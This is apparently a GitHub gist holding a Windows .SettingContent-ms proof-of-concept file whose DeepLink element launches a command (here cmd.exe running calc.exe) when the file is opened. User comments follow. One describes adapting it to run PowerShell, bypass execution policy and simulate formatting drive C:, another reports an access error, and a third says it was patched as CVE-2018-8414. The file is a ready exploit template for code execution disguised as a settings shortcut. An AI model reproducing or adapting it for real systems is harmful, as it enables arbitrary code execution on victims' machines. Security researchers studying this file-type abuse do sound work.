-
-
Save enigma0x3/b948b81717fd6b72e0a4baca033e07f8 to your computer and use it in GitHub Desktop.
| <?xml version="1.0" encoding="UTF-8"?> | |
| <PCSettings> | |
| <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent"> | |
| <ApplicationInformation> | |
| <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID> | |
| <DeepLink>%windir%\system32\cmd.exe /c calc.exe</DeepLink> | |
| <Icon>%windir%\system32\control.exe</Icon> | |
| </ApplicationInformation> | |
| <SettingIdentity> | |
| <PageID></PageID> | |
| <HostID>{12B1697E-D3A0-4DBC-B568-CCF64A3F934D}</HostID> | |
| </SettingIdentity> | |
| <SettingInformation> | |
| <Description>@shell32.dll,-4161</Description> | |
| <Keywords>@shell32.dll,-4161</Keywords> | |
| </SettingInformation> | |
| </SearchableContent> | |
| </PCSettings> |
I have used the above code to run PowerShell, bypass execution policy, and run a simulated format on drive C: See my link below.
https://github.com/bvoris/SettingContent-MS-File-Execution/
When I try the POC, I get the following message: "Windows cannot access the specified device, path, or file. You may not have the appropriate permissions to access the item."
I can manually run %windir%\system32\cmd.exe /c calc.exe
I can manually run %windir%\system32\control.exe
I have verified that the HostID guid is the same as other native settingcontent-ms files on my computer.
I have verified that the AppID value is the same as other native settingcontent-ms files on my computer.
I am not local admin on my machine. Is admin required? Other things I am doing wrong?
I have the same problem as unhackn
That would be because it was patched with CVE-2018-8414
Wow great find man.